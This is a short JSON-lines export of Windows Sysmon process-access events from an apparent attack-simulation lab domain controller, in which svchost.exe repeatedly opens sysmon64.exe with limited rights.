{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
